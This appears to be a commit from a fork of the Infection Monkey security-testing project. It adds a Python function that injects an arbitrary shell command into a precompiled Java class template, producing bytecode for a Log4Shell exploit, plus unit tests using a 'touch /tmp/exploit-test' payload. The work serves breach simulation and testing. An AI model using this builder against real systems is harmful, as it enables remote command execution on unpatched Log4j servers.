forked from p15670423/monkey
Agent: Add build_exploit_bytecode for log4shell exploiter
This commit is contained in:
parent
230ca3faf8
commit
68978907e2
Binary file not shown.
|
@ -0,0 +1 @@
|
|||
from .exploit_builder import build_exploit_bytecode, InvalidExploitTemplateError
|
|
@ -0,0 +1,62 @@
|
|||
import struct
|
||||
from pathlib import Path
|
||||
|
||||
EXPLOIT_TEMPLATE_PATH = Path(__file__).parent / "Exploit.class.template"
|
||||
INJECTION_TAG = "###"
|
||||
|
||||
|
||||
class InvalidExploitTemplateError(Exception):
|
||||
pass
|
||||
|
||||
|
||||
def build_exploit_bytecode(
|
||||
payload_command: str, exploit_template_path: Path = EXPLOIT_TEMPLATE_PATH
|
||||
) -> bytes:
|
||||
"""
|
||||
Build a payload used to exploit log4shell
|
||||
:param str payload_command: The command that will be executed on the remote host.
|
||||
:param Path exploit_template_path: The path to a file containing a pre-compiled Java class with
|
||||
the placeholder "###". This placeholder will be overwritten
|
||||
with the contents of payload_command. Defaults to
|
||||
`EXPLOIT_TEMPLATE_PATH`
|
||||
:return: Java bytecode that will execute the payload
|
||||
:rtype: bytes
|
||||
"""
|
||||
template_bytecode = _load_template_bytecode(exploit_template_path)
|
||||
exploit_bytecode = _inject_payload(payload_command, template_bytecode)
|
||||
|
||||
return exploit_bytecode
|
||||
|
||||
|
||||
def _load_template_bytecode(exploit_template_path: Path) -> bytes:
|
||||
with open(exploit_template_path, "rb") as h:
|
||||
template_bytecode = h.read()
|
||||
|
||||
if not template_bytecode.startswith(b"\xca\xfe\xba\xbe"):
|
||||
raise InvalidExploitTemplateError(
|
||||
f"Trying to load non-compiled Java class `{EXPLOIT_TEMPLATE_PATH}`."
|
||||
)
|
||||
|
||||
return template_bytecode
|
||||
|
||||
|
||||
def _inject_payload(payload: str, template_bytecode: bytes):
|
||||
payload_bytes = payload.encode()
|
||||
|
||||
if not INJECTION_TAG.encode() in template_bytecode:
|
||||
raise InvalidExploitTemplateError(f'No "{INJECTION_TAG}" tag to inject payload into.')
|
||||
|
||||
index = template_bytecode.index(INJECTION_TAG.encode())
|
||||
|
||||
exploit_bytecode = (
|
||||
template_bytecode[: index - 3]
|
||||
+ str_size(payload_bytes)
|
||||
+ payload_bytes
|
||||
+ template_bytecode[index + 3 :]
|
||||
)
|
||||
|
||||
return exploit_bytecode
|
||||
|
||||
|
||||
def str_size(data: bytes) -> bytes:
|
||||
return b"\x01" + struct.pack("!H", len(data))
|
Binary file not shown.
|
@ -0,0 +1,5 @@
|
|||
public class SourceCode {
|
||||
static {
|
||||
System.out.println("Hello World!");
|
||||
}
|
||||
}
|
|
@ -0,0 +1,33 @@
|
|||
import pytest
|
||||
|
||||
from infection_monkey.exploit.log4shell_utils import (
|
||||
InvalidExploitTemplateError,
|
||||
build_exploit_bytecode,
|
||||
)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def payload():
|
||||
return "bash -c 'touch /tmp/exploit-test'"
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def invalid_templates_dir(data_for_tests_dir):
|
||||
return data_for_tests_dir / "invalid_log4j_bytecode_templates"
|
||||
|
||||
|
||||
def test_inject_command(payload):
|
||||
expected_bytecode = b"\x21" + payload.encode() + b"\x0c"
|
||||
|
||||
exploit_bytecode = build_exploit_bytecode(payload)
|
||||
assert expected_bytecode in exploit_bytecode
|
||||
|
||||
|
||||
def test_missing_injection_tag(invalid_templates_dir, payload):
|
||||
with pytest.raises(InvalidExploitTemplateError):
|
||||
build_exploit_bytecode(payload, invalid_templates_dir / "MissingTag.class")
|
||||
|
||||
|
||||
def test_uncompiled_java_class(invalid_templates_dir, payload):
|
||||
with pytest.raises(InvalidExploitTemplateError):
|
||||
build_exploit_bytecode(payload, invalid_templates_dir / "SourceCode.java")
|
Loading…
Reference in New Issue